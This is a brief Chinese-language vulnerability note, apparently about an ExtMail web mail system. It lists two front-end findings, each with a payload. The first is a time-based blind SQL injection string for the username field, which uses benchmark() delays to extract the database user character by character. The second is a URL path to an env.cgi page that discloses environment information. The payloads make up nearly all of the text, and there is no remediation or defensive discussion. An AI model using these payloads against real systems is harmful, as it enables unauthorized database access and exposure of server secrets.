应用安全

前台SQL注入

payload(username处存在延迟注入):
admin' AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23

前台敏感信息泄露

payload:
http://xxx.xxx.com/extmail/cgi/env.cgi